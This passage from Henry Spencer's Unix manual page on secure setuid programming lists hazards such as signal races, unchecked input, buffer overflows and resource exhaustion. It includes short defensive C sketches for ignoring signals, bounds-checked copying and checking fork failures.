The standard descriptors may refer to a terminal which has a bizarre
mode setting, or which cannot be opened again,
or which gives end-of-file on any read attempt, or which cannot
be read or written successfully.
...P
The process may be hit by interrupt, quit, hangup, or broken-pipe signals,
singly or in fast succession.
The user may deliberately exploit the race conditions inherent
in catching signals;
ignoring signals is safe, but catching them is not.
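Ignoring the four signals named above might look like the following
sketch. The helper name ignore_user_signals is hypothetical; the signal
names are the usual ones for interrupt, quit, hangup, and broken pipe.

```c
#include <signal.h>
#include <stddef.h>

/* Ignore, rather than catch, the signals a user can easily generate.
 * Returns 0 on success, -1 if any signal() call fails. */
int ignore_user_signals(void)
{
    static const int sigs[] = { SIGINT, SIGQUIT, SIGHUP, SIGPIPE };
    size_t i;

    for (i = 0; i < sizeof sigs / sizeof sigs[0]; i++) {
        if (signal(sigs[i], SIG_IGN) == SIG_ERR)
            return -1;
    }
    return 0;
}
```

Because no handler is installed, there is no handler code for a user to
race against.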
...P
Although non-keyboard signals cannot be sent by ordinary users in V7,
they may perhaps be sent by the system authorities (e.g., to
indicate that the system is about to shut down),
so the possibility cannot be ignored.
...P
On some systems (not ours)
there may be an
...I alarm
signal pending on startup.
...P
The program may have children it did not create.
This is normal when the process is part of a pipeline.
...P
In some non-V7 systems, users can change the ownerships of their files.
Setuid programs should avoid trusting the owner identification of a file.
...P
User-supplied arguments and input data
...I must
be checked meticulously.
Overly long input stored in an array without proper bounds checking
can easily breach security.
When software depends on a file being in a specific format, user-supplied
data should never be inserted into the file without being checked first.
Meticulous checking includes allowing for the possibility of non-ASCII
characters.
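As one illustration of bounds checking, the sketch below refuses input
that does not fit the destination array instead of overflowing or
silently truncating it. The helper name copy_checked is hypothetical.

```c
#include <string.h>

/* Hypothetical helper: copy user input into a fixed-size buffer.
 * Returns 0 on success, -1 if src does not fit or an argument is invalid. */
int copy_checked(char *dst, size_t dstsize, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    len = strlen(src);
    if (len >= dstsize)        /* no room for the terminating NUL */
        return -1;
    memcpy(dst, src, len + 1); /* copies the NUL as well */
    return 0;
}
```

The caller is expected to treat a return of -1 as an error, not to carry
on with whatever happens to be in the buffer.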
...P
Temporary files left in public directories
like
...I /tmp
might vanish at inconvenient times.
...PP
The following are resource-exhaustion possibilities that the
program should respond properly to.
...P
The user might have used up all of his allowed processes, so
any attempt to create a new one (via
...I fork
or
...IR popen )
will fail.
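Checking for such a failure could be sketched as follows. The helper
name spawn_checked and the exit code 127 for a failed exec are
assumptions of the example; it does not retry waitpid() after an
interrupted call, and it does not reduce authority before the exec.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run path with argv in a child process.
 * Returns the child's exit status, or -1 if fork() or waitpid() fails
 * (for example because the user's process limit is exhausted) or the
 * child did not exit normally. */
int spawn_checked(const char *path, char *const argv[])
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;             /* fork failed: report it, do not go on */
    if (pid == 0) {
        execv(path, argv);
        _exit(127);            /* only reached if execv() failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```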
...P
There might be many files open, exhausting the supply of descriptors.
Running
...IR closeall (3),
on systems which have it,
is recommended.
...P
There might be many arguments.
...P
The arguments and the environment together might occupy a great deal
of space.
...PP
Systems which impose other resource limitations can open setuid
programs to similar resource-exhaustion attacks.
...PP
Setuid programs which execute ordinary programs without reducing
authority pass all the above problems on to such unprepared children.
Standardizing the execution environment is only a partial solution.
...SH SEE ALSO
closeall(3), standard(3)
...SH HISTORY
Locally written, although based on outside contributions.
...SH AUTHOR
Henry Spencer <henry@zoo.toronto.edu>
...SH BUGS
The list really is rather long...
and probably incomplete.
...PP
Neither the author nor the University of Toronto accepts any responsibility
whatever for the use or non-use of this information.
-->
</book>